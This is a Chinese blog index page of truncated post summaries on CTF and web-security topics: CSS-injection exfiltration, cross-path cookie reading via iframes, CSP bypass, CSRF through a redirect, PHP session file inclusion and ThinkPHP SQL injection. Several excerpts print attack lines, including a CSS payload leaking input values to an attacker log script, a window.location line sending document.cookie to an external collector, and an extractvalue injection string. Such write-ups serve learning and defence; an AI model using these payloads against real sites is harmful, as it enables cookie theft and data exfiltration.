摘要:
payload: input[value^='a'] { background-image: url(http://localhost/css-improved/attacker/log.php/a); }input[value^='ab'] { background-image: url(http 阅读全文
摘要:
同域下,即使设置了cookie的路径还是能将不同路径cookie读出来。 1.在/ctf/day3/ 目录设置一个cookie 2.其他目录下是不能访问这个cookie的 3.通过iframe可以实现跨目录读取cookie 总结:通过设置path不能防止cookie被盗取。 阅读全文
摘要:
iframe的子操作父窗口,父操作子窗口: test.php: a.html 子操作父窗口: 父操作子: 以上是在同域下操作的,可对不同页面读写操作, 如果将iframe的srcs修改为<iframe src="http://www.123.com/csp/a.html" id="iframe">< 阅读全文
摘要:
iframe.php代码如下: allow-popups开启时,window.open就可以打开新的窗口。 看csp规则,默认是在当前域内,如果这是一个ctf题的话,就很简单了,window.location.href='http://aa.xxxx.ceye.io?'+document.cooki 阅读全文
摘要:
1、self-xss+302跳转构造csrf的利用: 1、login.php 存在跳转2、http://54.223.108.205:23333/login.php?redirecturl=//vps/c.html 通过302跳转构造csrf提交到reportbug页面让管理员提交一篇有xss的文章 阅读全文
摘要:
页面目录如下: register.php注册页面。 user.php可发送消息给其他用户。 profile.php可配置参数添加用户头像(加载eval js文件)。 static存在redirect.php重定向页面。 看下csp规则: 1、script没有开启unsafe-inline,也就是说不 阅读全文
摘要:
1、php 键名 + 竖线 + 经过 serialize() 函数反序列处理的值2、php_binary 键名的长度对应的 ASCII 字符 + 键名 + 经过 serialize() 函数反序列处理的值3、php_serialize (php>=5.5.4) 经过 serialize() 函数反序 阅读全文
摘要:
exp.php的内容,存在文件包含 查看phpinfo信息 当cleanup是off的情况下,构造如下数据包上传文件。 当 session.upload_progress.enabled INI 选项开启时,一个上传在处理中,同时POST一个与INI中设置的session.upload_progre 阅读全文
摘要:
1、load方法 使用load()方法通过Ajax请求加载服务器中的数据,并把返回的数据放置到指定的元素中,它的调用格式为: $(selector).load(URL,data,callback); 参数url为加载服务器地址,可选项data参数为请求时发送的数据,callback参数为数据请求成功 阅读全文
摘要:
1.where后直接直接拼接会产生注入 $data = M('user')->where("id=".I('id'))->select(); 2.table ?biao=thinkphp_user where 1=1 and 1=(extractvalue(1, concat(0x7e, (sele 阅读全文